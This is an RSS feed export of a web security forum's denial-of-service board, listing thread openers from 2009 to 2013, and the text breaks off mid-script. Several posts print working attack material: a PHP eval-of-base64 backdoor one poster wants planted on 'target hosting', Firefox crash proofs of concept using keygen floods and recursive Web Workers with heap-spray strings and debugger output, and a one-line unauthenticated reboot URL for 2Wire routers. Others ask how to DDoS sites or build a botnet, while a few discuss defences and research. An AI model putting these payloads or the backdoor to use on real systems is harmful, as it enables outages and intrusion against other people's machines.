<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Web Application Security Forum - DoS</title>
        <description>How do we crash systems, browsers, or otherwise bring things to a halt, and how do we protect those things?</description>
        <link>http://sla.ckers.org/forum/list.php?14</link>
        <lastBuildDate>Wed, 22 May 2013 21:17:35 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,51742,51742#msg-51742</guid>
            <title>Security In Authentication for Web Applications (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,51742,51742#msg-51742</link>
            <description><![CDATA[Hi guys, please i need some assistance in this area. Im doing my Masters and Im researching on this topic above. Iv done some reviews but cant really come up with  concrete weaknesses on the related works. Any assistance in terms of what to do differently or enhance the security will be highly appreciated. Thanks]]></description>
            <dc:creator>Endowd</dc:creator>
            <category>DoS</category>
            <pubDate>Sun, 05 May 2013 17:17:10 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,51360,51360#msg-51360</guid>
            <title>Distributed Denial of Service Prevention Techniques (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,51360,51360#msg-51360</link>
            <description><![CDATA[Distributed Denial of Service Prevention Techniques<br />
B. B. Gupta, R. C. Joshi, Manoj Misra<br />
http://arxiv.org/abs/1208.3557<br />
<br />
<blockquote class="bbcode"><div><small>Quote<br/></small><strong></strong><br/>This paper presents overview of DDoS problem, available <br />
DDoS attack tools, defense challenges and principles and a <br />
classification of available mechanisms that are proposed in <br />
literature on preventing Internet services from possible DDoS <br />
attacks and discuss the strengths and weaknesses of each <br />
mechanism. A summery of pending concerns draw attention to <br />
core problems in existing mechanisms.</div></blockquote>]]></description>
            <dc:creator>infinity</dc:creator>
            <category>DoS</category>
            <pubDate>Wed, 29 Aug 2012 03:20:57 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,46063,46063#msg-46063</guid>
            <title>mailto: crash (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,46063,46063#msg-46063</link>
            <description><![CDATA[Excellent, the mailto: crash crashtest !<br />
<br />
the loop stopped at 135 occurrences (XPP SP3, 3.5 Go RAM)<br />
I suceeded to stop the Outlook process with the Windows task Manager.<br />
No reboot :-)<br />
<br />
Next time, I will *not* click a link which reads &quot;may crash&quot;...<br />
<br />
Cheers to all<br />
<br />
Didier<br />
www.dtl-conseil.com]]></description>
            <dc:creator>PRSTSC::DTL</dc:creator>
            <category>DoS</category>
            <pubDate>Wed, 11 Apr 2012 09:33:47 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,42503,42503#msg-42503</guid>
            <title>Search,php; memberlist.php; login.php DOS and Gateway Time Out Errors (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,42503,42503#msg-42503</link>
            <description><![CDATA[Hi guys i was reading about the Gateway time out errors and how they are produced, is it possible to make a request to these php functions and overload a specific website so it would crash and/or freeze?<br />
<br />
I was thinking about the following:<br />
1.-making a very big request in those webpages, the logical consecuence will be that the server could not fulfill the request and come to a halt<br />
2.- Use ping command to the especific URL and crash website<br />
3.- Use a script to do it.<br />
<br />
Is this possile???]]></description>
            <dc:creator>johndoe</dc:creator>
            <category>DoS</category>
            <pubDate>Sat, 28 Jan 2012 12:29:35 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,40515,40515#msg-40515</guid>
            <title>help inserting php script into target hosting @ PHP 5.2.6 sleep() Local Memory Exhaust Exploit (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?14,40515,40515#msg-40515</link>
            <description><![CDATA[Hey I want some help in executing this exploit. I'm stuck:(<br />
<br />
In reference to exploit described in URL.<br />
1337day.com/exploits/6543<br />
<br />
&lt;?php<br />
/* put this one on target hosting */<br />
if ( ! $data = @getenv('HTTP_ACCEPT_LANGUAGE'))<br />
    $data = $_SERVER['HTTP_ACCEPT_LANGUAGE'];<br />
if ( ! preg_match('#^[a-zA-Z0-9/+]*={0,2}$#', $data))<br />
    die('no propety data');<br />
eval(base64_decode($data));<br />
?&gt;<br />
<br />
The exploit says to put this in the target hosting. I want to know how can i do this? Don't i have to find an input parameter which takes php codes as input.]]></description>
            <dc:creator>lazer</dc:creator>
            <category>DoS</category>
            <pubDate>Wed, 04 Jan 2012 07:43:43 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,37808,37808#msg-37808</guid>
            <title>Slowloris on IIS (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?14,37808,37808#msg-37808</link>
            <description><![CDATA[i have downloaded slowloris and make it run on ubuntu...i ddos some site ...and came to know that it dosent works on IIS ? can anyone tell how could we Ddos IIS ?]]></description>
            <dc:creator>ikramniazi</dc:creator>
            <category>DoS</category>
            <pubDate>Sat, 24 Dec 2011 10:29:53 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,37797,37797#msg-37797</guid>
            <title>Testing Slowloris on Website (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,37797,37797#msg-37797</link>
            <description><![CDATA[I have just downloaded and tried testing my domain with slowloris to see if I could temperarily shut it down with cmd.Whenever I initiate a connection, my internet always slows way down and even stops working but my website never seems to be clogged up. Any thoughts? I know my server is running apache.]]></description>
            <dc:creator>ryanyeti</dc:creator>
            <category>DoS</category>
            <pubDate>Sat, 24 Dec 2011 10:31:38 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,35130,35130#msg-35130</guid>
            <title>Understanding nigr0 (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,35130,35130#msg-35130</link>
            <description><![CDATA[Hello, complete newbie here.<br />
<br />
I'm just looking through the nigr0 script code:<br />
http://pastebin.com/YxqkXvQU<br />
<br />
I am having trouble understanding what this script actually does. To me it seems like it generates another script that you can DoS with? <br />
<br />
Any insights would be great.]]></description>
            <dc:creator>hereyago</dc:creator>
            <category>DoS</category>
            <pubDate>Tue, 20 Jul 2010 01:12:59 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,34722,34722#msg-34722</guid>
            <title>protecting against slowloris (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,34722,34722#msg-34722</link>
            <description><![CDATA[Hey,<br />
<br />
How do you guys protect against slowloris (Apache 2.2).<br />
There is an Apache module mod_antiloris. Is it stable and OK for production use? What about any drawbacks of using it?<br />
They say it is good idea to use mod_antiloris together with iptables' connlimit.<br />
But there are a lot of ISPs (and other companies) which give many users the same IP address.<br />
Let's say I need to make my site visible to everyone (which doesn't try to DoS me of course ;) ) regardless if they share the same IP with thousand of other users or not...<br />
What is the best protection?<br />
AFAIK mod_security can protect against slowloris attack but i couldn't be able to find rules for it to do so.<br />
<br />
Thx,<br />
Mike]]></description>
            <dc:creator>cx</dc:creator>
            <category>DoS</category>
            <pubDate>Sat, 24 Dec 2011 10:33:19 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,34532,34532#msg-34532</guid>
            <title>F5 key automated through linux command/script? (6 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,34532,34532#msg-34532</link>
            <description><![CDATA[hello,<br />
<br />
im web developer and using various stress tools, including Slowloris and traditional F5 refresh key.<br />
<br />
but does anyone know any way to automatically pressing F5 keys very rapidly. it can be linux command or script<br />
<br />
thanks in advance.]]></description>
            <dc:creator>apasajja</dc:creator>
            <category>DoS</category>
            <pubDate>Fri, 28 May 2010 07:23:41 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,33972,33972#msg-33972</guid>
            <title>Firefox 3.6.2 DOS CRASH (1 reply)</title>
            <link>http://sla.ckers.org/forum/read.php?14,33972,33972#msg-33972</link>
            <description><![CDATA[Okay so I have a lame POC (Firefox 3.6.2 Remote Denial of Service Exploit Vulnerability) DOS attack which may be exploitable further?  I just wanted to get some feedback and/or ideas from the greater minds available online.  Either way if you have time check it out, debug the crash results, and please post any updates or comments.  http://cybermediaplanet.com/security/ff3.6/FF3.6-PoC-v1.4.html <br />
<br />
Regards,<br />
malloc(i)]]></description>
            <dc:creator>malloci</dc:creator>
            <category>DoS</category>
            <pubDate>Thu, 25 Mar 2010 16:34:22 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,33484,33484#msg-33484</guid>
            <title>Firefox Crypto DOS awkwardness. (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,33484,33484#msg-33484</link>
            <description><![CDATA[Playing around with the &lt;keygen&gt; tag a couple of minutes and found this. Later on after I posted it on Bugzilla (546308) I found that Thierry Zoller  among others had discovered it already a bit earlier (Bug 469565). Practically the same, though in practice different. On first glance it might look an obvious denial of service, one key point has been omitted in the other bug in my opinion. Keys that are generated are stored inside a file called <b>key3.db</b> which also stores signon keys and other crypto stuff FireFox utilizes. Problem is, that file can be stuffed with as many keys as we please. I was able to let it grow from a few KB to a notable 1.44MB (size of a floppy eh?) in matter of minutes. Each key added is about 4KB in size. Now, the larger this key file is, the longer it takes to search and access it. So what if I let it run for hours in a users browser? day after day? maybe through some more clever way than I propose below, that way the key file because enormous in size with the problem that it cannot be edited without affecting stability. If you try and edit it, you will corrupt the profile folder's key3db irretrievable. If you edit it (and I have), SSL keys are LOST TOO. So in essence, once that file is filled with keys, it stays there. I also see no vacuuming of the file, nor is it truncated, or emptied after a series of trials over days. Which seems to imply that it can grow ad infinitum. <br />
<br />
Anyway, here is it if you like to try. But remember that it will affect the stability of your browser as explained above.<br />
 <br />
<br />
<pre class="bbcode">
&lt;html&gt;
&lt;body&gt;
&lt;div id=&quot;cryptokombat&quot;&gt;&lt;/div&gt;
&lt;/body&gt;

&lt;script&gt;

// besides the annoying denial of service and the appearance of a wacky progress bar,
// it also clogs up key3.db in your Firefox profile folder with 4 KB on each generated key :)
// on first look, the key3.db doesn't seem to have a size limit at all
// making it possible to generate as much keys as we like.
// after few minutes the key3.db file size reached 1,44MB

function gen10(i) {

		// generate 10 iframes per loop.
	  	var fr = document.getElementById(&quot;sub&quot;+i);
	  	var doc = fr.contentDocument;
	  	if (doc == undefined || doc == null) {
				doc = fr.contentWindow.document;
	  	}
	  
	  	var  kitana = '&lt;html&gt;&lt;body&gt;A&lt;form method=&quot;get&quot; action=&quot;?&quot; id=&quot;sub7&quot;&gt;&lt;keygen name=&quot;RSA public key&quot; challenge=&quot;\0&quot; KEYTYPE=&quot;RSA&quot;&gt;';
	 		 kitana += '&lt;input type=&quot;submit&quot; name=&quot;createcert&quot; value=&quot;Generate&quot;&gt;&lt;/form&gt;&lt;/body&gt;&lt;script&gt;document.getElementById(\'sub7\').submit();&lt;\/script&gt;';
		doc.open();
	  	doc.write(kitana);
	  	doc.close();
	}


	for(i=0;i&lt;33;i++) {
		try {
			data = document.getElementById(&quot;cryptokombat&quot;).innerHTML;
			document.getElementById(&quot;cryptokombat&quot;).innerHTML = data += &quot;&lt;iframe id=\&quot;sub&quot;+i+&quot;\&quot; src=\&quot;about:blank\&quot; width=\&quot;1\&quot; height=\&quot;11\&quot;&gt;&lt;/iframe&gt;&quot;;
			} catch(e) {
		}
	}
	for(i=0;i&lt;33;i++) {
		try {
			gen10(i);
			} catch(e) {
		}
	}

&lt;/script&gt;
&lt;/html&gt;</pre>
<br />
So while this is fun in some sense, what else can we do? what if the user has a portable laptop with little storage? or what if he uses FireFox portable? or what is he uses a smart phone with limited storage?]]></description>
            <dc:creator>SAS</dc:creator>
            <category>DoS</category>
            <pubDate>Tue, 16 Feb 2010 22:29:26 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,32817,32817#msg-32817</guid>
            <title>wanting to learn... (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,32817,32817#msg-32817</link>
            <description><![CDATA[Hello everyone.<br />
I am new to this website, and new to Ddos. I am &quot;newbie&quot; when it comes to Ddos, but I really wish to learn. If there is any &quot;tips&quot; that you can give, it would be really cool.<br />
<br />
I know how to read the basics of a lot of codes. So, if there is any further studies I need to go into with Javascript, PhP, C, ect. please let me know.<br />
<br />
-What I am really looking to learn-<br />
<br />
-make my own botnet<br />
-learn how to fully use a botnet [if there is anyone willing to teach me the basics of a botnet, that would be cool as well] [i do understand what a botnet is, just wanting to learn the insides of it]<br />
-what languages are mainly used to make a botnet.<br />
-ect.<br />
<br />
<br />
<br />
&quot;well if anyone could help me out, it would be much appreciated.&quot;]]></description>
            <dc:creator>purple dos</dc:creator>
            <category>DoS</category>
            <pubDate>Thu, 07 Jan 2010 07:36:17 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,32095,32095#msg-32095</guid>
            <title>2Wire remote management interface DoS (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,32095,32095#msg-32095</link>
            <description><![CDATA[========================================<br />
               2WIRE REMOTE DENIAL OF SERVICE<br />
         ========================================<br />
<br />
<br />
Device:		2wire Gateway Router/Modem<br />
Vulnerable Software:	&lt; 5.29.52<br />
Vulnerable Models:	1700HG<br />
			1701HG<br />
			1800HW<br />
			2071<br />
			2700HG<br />
			2701HG-T<br />
Release Date: 	2009-09-00<br />
Last Update: 	2009-09-00<br />
Critical: 	Moderately critical<br />
Impact: 	Denial of service<br />
		Remote router reboot<br />
Where:		From remote<br />
		In the remote management interface<br />
Solution Status:	Vendor issued firmware patches<br />
			Providers are in charge of applying the patches<br />
WebVuln Advisory:	1-003<br />
<br />
<br />
  BACKGROUND<br />
=======================<br />
<br />
The remote management interface of some 2wire modems is enabled by default.<br />
This interface runs over SSL on port 50001 with an untrusted issuer certificate.<br />
<br />
++EspaÃ±ol<br />
Algunos mÃ³dems 2wire tienen la interfaz remota habilitada por default.<br />
La interfaz utiliza SSL con un certificado invalido en el puerto 50001.<br />
<br />
<br />
   DESCRIPTION<br />
=======================<br />
<br />
Some 2wire modems are vulnerable to a remote denial of service attack.<br />
By requesting a special url from the Remote Management interface, an unathenticated<br />
user can remotely reboot the complete device.<br />
<br />
++<br />
Algunos mÃ³dems 2wire son vulnerables a un ataque de denegaciÃ³n de servicio.<br />
Un usuario no autenticado puede reiniciar el dispositivo enviando una peticiÃ³n a<br />
la interfaz de AdministraciÃ³n remota.<br />
<br />
<br />
  EXPLOIT / POC<br />
=======================<br />
<br />
 https://&lt;remoteIP&gt;:50001/xslt?page=%0d%0a<br />
<br />
<br />
  WORKAROUND<br />
=======================<br />
<br />
Disable Remote Management in Firewall -&gt; Advanced Settings.<br />
<br />
++<br />
Deshabilitar AdministraciÃ³n remota en Cortafuegos -&gt; ConfiguraciÃ³n avanzada<br />
<br />
<br />
   DISCLOSURE TIMELINE<br />
=======================<br />
<br />
2009/09/06 - Vulnerability discovered<br />
2009/09/08 - Vendor contacted<br />
<br />
  REFERENCES<br />
=======================<br />
<br />
Preth00nker's exploit (LAN) - http://www.milw0rm.com/exploits/2246<br />
2Wire Gateways CRLF DoS (from local network) - http://secunia.com/advisories/21583<br />
Hakim.Ws - http://www.hakim.ws<br />
WebVuln - http://www.webvuln.com]]></description>
            <dc:creator>hkm</dc:creator>
            <category>DoS</category>
            <pubDate>Sun, 01 Nov 2009 20:21:41 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,31929,31929#msg-31929</guid>
            <title>slowloris vs nginx (4 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,31929,31929#msg-31929</link>
            <description><![CDATA[I've been testing slowloris against nginx to understand the slowloris attack more, and I need help to make sense of it.<br />
<br />
From the original thread comments http://ha.ckers.org/blog/20090617/slowloris-http-dos/ it seems that slowloris exhausts _some_ resource specific to the web server, and that for Apache it is max clients.<br />
<br />
In my tests against nginx (on a debian machine http://blog.rayfoo.info/2009/10/12/testing-slowloris-against-nginx), nginx seems refuse any incoming connections when its file descriptor count hits the maximum allowed for that process.  And during this time it continues to listen (for a while at least) to requests on the connections already established.<br />
<br />
I'm not sure yet whether this is purely a kernel/process/linux limitation (I'm thinking ulimit), and this is pretty different in behaviour from how Apache dies from the slowloris attack, but I'd think that nginx is also affected by slowloris because of the nature of this attack (current connections maintained, new connections denied, web server host TCP stack not overloaded)<br />
<br />
Anyone has any thoughts on this?  Or did I misunderstand the mechanics of the Slowloris?]]></description>
            <dc:creator>lh6lejw7k8</dc:creator>
            <category>DoS</category>
            <pubDate>Tue, 27 Oct 2009 21:43:57 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,31588,31588#msg-31588</guid>
            <title>Guard Page Violation (Firefox 3.5.3) (3 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,31588,31588#msg-31588</link>
            <description><![CDATA[Hello, sla.ckers!<br />
Those who use Firefox 3.5.3 with FoxTab 1.2.1 and Shockwave Flash 10.0.32.18 may see this kind of thing. To reproduce this you need to OPEN firefox.exe from WinDbg - attaching to already running Firefox doesn't show such thing.<br />
<pre class="bbcode">(618.974): Guard page violation - code 80000001 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=056c8000 ebx=00000010 ecx=0013eb28 edx=08010000 esi=08010000 edi=0013eb28
eip=051b8d2a esp=0013e900 ebp=00000003 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
NPSWF32!native_ShockwaveFlash_TCallLabel+0xdd9f4:
051b8d2a 881e            mov     byte ptr [esi],bl          ds:0023:08010000=10
0:000&gt; !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Guard Page Violation starting at NPSWF32!native_ShockwaveFlash_TCallLabel+0x00000000000dd9f4 (Hash=0x00000000.0x00000007)</pre>
I'm not quite sure about, cause I only could test it on my machine (Windows XP Pro SP2). But, as far as it is exploitable, what can you say about it?]]></description>
            <dc:creator>p0deje</dc:creator>
            <category>DoS</category>
            <pubDate>Fri, 25 Sep 2009 09:23:20 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,31587,31587#msg-31587</guid>
            <title>Does this code crash your Firefox? (no replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,31587,31587#msg-31587</link>
            <description><![CDATA[Couldn't help it... just had to add a third thread with the same name.  Hey, at least I didn't copy my code line for line from the other posts (just my own post).<br />
<br />
Either way, I am fairly sure this code will crash your Firefox3.5 browser.<br />
<br />
This is just one version of the PoC I have been coding. It is ugly code but should serve as an example to use for debugginf FF3.5. Hope to get some feedback (crashes, debug, comments, ideas). <br />
<br />
------------------------------------- <br />
index.html <br />
------------------------------------- <br />
&lt;!DOCTYPE HTML&gt; <br />
&lt;html&gt; <br />
&lt;head&gt; <br />
&lt;title&gt;DOS&lt;/title&gt; <br />
&lt;/head&gt; <br />
&lt;body&gt; <br />
&lt;p&gt;&lt;h1&gt;Please Wait, while I CRASH your Browser; it should not take long :)...&lt;/h1&gt;:&lt;/p&gt;&lt;div id=&quot;result&quot;&gt;&lt;/div&gt; <br />
<br />
&lt;script type=&quot;text/javascript&quot;&gt; <br />
var worker = new Worker(&quot;workCRASH.js&quot;); <br />
<br />
// Watch for messages from the worker <br />
worker.onmessage = function(event) <br />
{ <br />
// The message from the client: <br />
//event.data <br />
// alert(document.domain + &quot; - &quot; + event.data); <br />
// window.location = 'index.html'; <br />
// window.location = 'index.html'; <br />
// window.open ('index.html'); <br />
document.getElementById(&quot;result&quot;).textContent = event.data; <br />
}; <br />
//var buf = unescape(&quot;%u9090%u9090&quot;+&quot;%u9090%u9090&quot;+&quot;%u9090%u9090&quot;+&quot;%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090&quot;); <br />
//var buf = unescape(&quot;%u0c0c%u0c0c&quot;); <br />
var buf = unescape(&quot;\xcc\xcc\xcc\xcc&quot;); <br />
var str = &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;; <br />
buf = buf+str; <br />
worker.postMessage(buf); <br />
<br />
&lt;/script&gt; <br />
&lt;/body&gt; <br />
&lt;/html&gt; <br />
<br />
----------------------------------------------------------- <br />
workCRASH.js <br />
-------------------------------------------- <br />
<br />
onmessage = function(event){ <br />
<br />
<br />
var worker = new Worker(&quot;workCRASH.js&quot;); <br />
worker.onmessage = function(event) <br />
{ <br />
var worker = new Worker(&quot;workCRASH-Test.js&quot;); <br />
worker.onmessage = function(event) <br />
{ <br />
worker.postMessage(event.data.concat(event.data)); <br />
CollectGarbage(); <br />
postMessage(event.data.concat(event.data)); <br />
CollectGarbage(); <br />
}; <br />
worker.postMessage(event.data.concat(event.data)); <br />
postMessage(event.data.concat(event.data)); <br />
}; <br />
<br />
worker.postMessage(event.data.concat(event.data)); <br />
postMessage(event.data.concat(event.data)); <br />
<br />
} <br />
<br />
------------------------------------- <br />
workCRASH-Test.js <br />
------------------------------------ <br />
<br />
onmessage = function(event){ <br />
<br />
var worker = new Worker(&quot;workCRASH-Test.js&quot;); <br />
worker.onmessage = function(event) <br />
{ <br />
//var nop = unescape(&quot;\x90\x90\x90\x90&quot;); <br />
<br />
var str1 = &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;; <br />
var str2 = &quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot;; <br />
<br />
worker.postMessage(event.data.concat(str1+str2)); <br />
postMessage(event.data.concat(str1+str2)); <br />
}; <br />
<br />
worker.postMessage(event.data.concat(event.data)); <br />
postMessage(event.data); <br />
<br />
} <br />
<br />
____________________________________ <br />
<br />
The code is a mess right now... I have been fuzzing it with diffrent input. Give it a go and let me know if it crashes your FF3.5 browser. If you have any time to debug the crash please post some output. <br />
<br />
You might have to run the code a few times to get it to crash on a diffrent place then the xul!XPCNativeSet::Mark: error. Like I said I have not had to much time to work on the code, it is mostly a jumbled mess right now. I still am trying to find out how I can overwrite the registers. <br />
<br />
malloc(i)]]></description>
            <dc:creator>malloci</dc:creator>
            <category>DoS</category>
            <pubDate>Thu, 24 Sep 2009 15:54:07 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,31355,31355#msg-31355</guid>
            <title>DoS by Regex or reDoS (2 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,31355,31355#msg-31355</link>
            <description><![CDATA[Alex Roichman and Adar Weidman form Checkmarx found a new attack vector on Web Applications. By exploiting the Regular Expression Denial of Service (ReDoS) vulnerability an attacker can make a Web application unavailable to its intended users. ReDoS is commonly known as a &quot;bug&quot; in systems, but Alex Roichman and Adar Weidman show how serious it is and how using this technique, various applications can be &quot;ReDoSed&quot;. These include, among others, Server-side of Web applications and Client-side Browsers. The art of attacking the Web by ReDoS is by finding inputs which cannot be matched by Regexes and on these Regexes a Regex-based Web systems get stuck.<br />
<br />
For further reading:<br />
http://www.checkmarx.com/NewsDetails.aspx?id=23]]></description>
            <dc:creator>Alex Roichman</dc:creator>
            <category>DoS</category>
            <pubDate>Sat, 12 Sep 2009 07:50:58 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,30128,30128#msg-30128</guid>
            <title>Firefox 3.5 JS Web Worker DoS - Debug Help (19 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,30128,30128#msg-30128</link>
            <description><![CDATA[Hello Sla.ckers,<br />
<br />
This is my first post so please take it easy on me, I'm still learning.  I have a question regarding debugging firefox.  I have loaded the symbols from the symbol server and have some debug output; however, I am not sure what I am looking at.  I am curious if this code might lead to a possible exploit?  I have read a little on the recent heap spray and buffer overflow exploits on firefox and was thinking this might be along those lines.  Once again I am a newbie, so if you could point me in the right direction to research I would appreciate it.  My code:<br />
<br />
index.html<br />
-------------------------------------------<br />
&lt;!DOCTYPE HTML&gt;<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
    &lt;title&gt;DOS&lt;/title&gt;<br />
&lt;/head&gt;<br />
&lt;body&gt;<br />
&lt;p&gt;&lt;h1&gt;Please Wait, while I CRASH your Browser; it should not take long :)...&lt;/h1&gt;:&lt;/p&gt;&lt;div id=&quot;result&quot;&gt;&lt;/div&gt;<br />
<br />
    &lt;script type=&quot;text/javascript&quot;&gt;<br />
	<br />
	var worker = new Worker(&quot;workCRASH.js&quot;);<br />
	// Watch for messages from the worker<br />
	worker.onmessage = function(event)<br />
	{<br />
	  // The message from the client:<br />
		document.getElementById(&quot;result&quot;).textContent = event.data;<br />
	};<br />
	var buf = unescape(&quot;AAAAAAAAAAAAAAAAAA%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090&quot;); <br />
	worker.postMessage(buf);<br />
<br />
    &lt;/script&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;<br />
<br />
<br />
workCRASH.js<br />
-------------------------------------------------<br />
onmessage = function(event){<br />
<br />
var worker = new Worker(&quot;workCRASH.js&quot;);<br />
	worker.onmessage = function(event)<br />
	{	<br />
			worker.postMessage(event.data.concat(event.data));<br />
		postMessage(event.data.concat(event.data));<br />
	};<br />
	worker.postMessage(event.data.concat(event.data));<br />
		postMessage(event.data.concat(event.data));<br />
<br />
}<br />
<br />
WinDbg Debug<br />
-------------------------------------------<br />
(1380.1234): Break instruction exception - code 80000003 (first chance)<br />
ntdll!DbgBreakPoint:<br />
00000000`77874ea0 cc              int     3<br />
0:018&gt; g<br />
(1380.1574): Access violation - code c0000005 (first chance)<br />
First chance exceptions are reported before any exception handling.<br />
This exception may be expected and handled.<br />
xul!XPCNativeSet::Mark:<br />
00000000`70f978e6 0fb74602        movzx   eax,word ptr [esi+2] ds:002b:00000000`00000006=????<br />
<br />
------------ Disassembly -------------------------------<br />
xul!XPCNativeSet::Mark:<br />
  572 xpcinlines.h         00000000`70f978e6 0fb74602        movzx   eax,word ptr [esi+2] ds:002b:00000000`00000006=????<br />
  573 xpcinlines.h         00000000`70f978ea 6685c0          test    ax,ax<br />
<br />
<br />
----------  VS Debug --------------<br />
<br />
--- e:\builds\moz2_slave\win32_build\build\obj-firefox\dist\include\xpcom\nscomptr.h <br />
64C578C2 56               push        esi  <br />
64C578C3 8B F1            mov         esi,ecx <br />
64C578C5 8B 06            mov         eax,dword ptr [esi] <br />
64C578C7 83 26 00         and         dword ptr [esi],0 <br />
64C578CA 85 C0            test        eax,eax <br />
64C578CC 74 06            je          nsCOMPtr&lt;nsIXPConnectJSObjectHolder&gt;::StartAssignment+12h (64C578D4h) <br />
64C578CE 8B 08            mov         ecx,dword ptr [eax] <br />
64C578D0 50               push        eax  <br />
64C578D1 FF 51 08         call        dword ptr [ecx+8] <br />
64C578D4 8B C6            mov         eax,esi <br />
64C578D6 5E               pop         esi  <br />
64C578D7 C3               ret              <br />
64C578D8 56               push        esi  <br />
64C578D9 6A 00            push        0    <br />
64C578DB 8B F1            mov         esi,ecx <br />
64C578DD E8 DE C6 E5 FF   call        nsCOMPtr_base::nsCOMPtr_base (64AB3FC0h) <br />
64C578E2 8B C6            mov         eax,esi <br />
64C578E4 5E               pop         esi  <br />
64C578E5 C3               ret              <br />
--- e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\xpcinlines.h ---<br />
64C578E6 0F B7 46 02      movzx       eax,word ptr [esi+2] <br />
64C578EA 66 85 C0         test        ax,ax <br />
64C578ED 78 1E            js          XPCNativeSet::Mark+27h (64C5790Dh) <br />
64C578EF 8D 56 04         lea         edx,[esi+4] <br />
64C578F2 0F B7 C8         movzx       ecx,ax <br />
64C578F5 EB 0C            jmp         XPCNativeSet::Mark+1Dh (64C57903h) <br />
64C578F7 8B 02            mov         eax,dword ptr [edx] <br />
64C578F9 66 81 48 08 00 80 or          word ptr [eax+8],8000h <br />
<br />
The thread 'Win32 Thread' (0x17b4) has exited with code 0 (0x0).<br />
Unhandled exception at 0x64c578e6 (xul.dll) in firefox.exe: 0xC0000005: Access violation reading location 0x00000006.<br />
First-chance exception at 0x64c578e6 (xul.dll) in firefox.exe: 0xC0000005: Access violation reading location 0x00000006.<br />
<br />
Sorry for the long post... Just trying to learn here.<br />
<br />
Thanks for the help and input.<br />
<br />
Malloc(i)]]></description>
            <dc:creator>malloci</dc:creator>
            <category>DoS</category>
            <pubDate>Thu, 29 Oct 2009 14:26:43 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?14,29860,29860#msg-29860</guid>
            <title>Does this code crash your Firefox? (6 replies)</title>
            <link>http://sla.ckers.org/forum/read.php?14,29860,29860#msg-29860</link>
            <description><![CDATA[I write a code; but for me work, for the pc of my friend no: why?<br />
<br />
tested on : WinXP Sp2 + Mozilla FIreFox 3.5.2 &lt;= WORK<br />
<br />
tested on: WinXP sp3 + MOzilla FIrefox 3.5 &lt;= not work<br />
<br />
it's true&gt;? test by yuorself<br />
<br />
code:<br />
<br />
<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;title&gt; [~] bUt Work? MOzilla Firefox 3.5.2 &lt;= (char) Buffer Overflow crash exploit&lt;/title&gt;<br />
&lt;/head&gt;<br />
&lt;script type=&quot;text/javascript&quot;&gt;<br />
var x=String.fromCharCode(120);<br />
var a=&quot;&quot;;<br />
var b=&quot;&quot;;<br />
for(i=0;i&lt;1024;i++)<br />
{a=a+x;}<br />
for(i=0;i&lt;1024;i++)<br />
{b=b+a;}<br />
var c=x;<br />
for(i=0;i&lt;27;i++) c += c;<br />
for(i=0;i&lt;88;i++) c += b;<br />
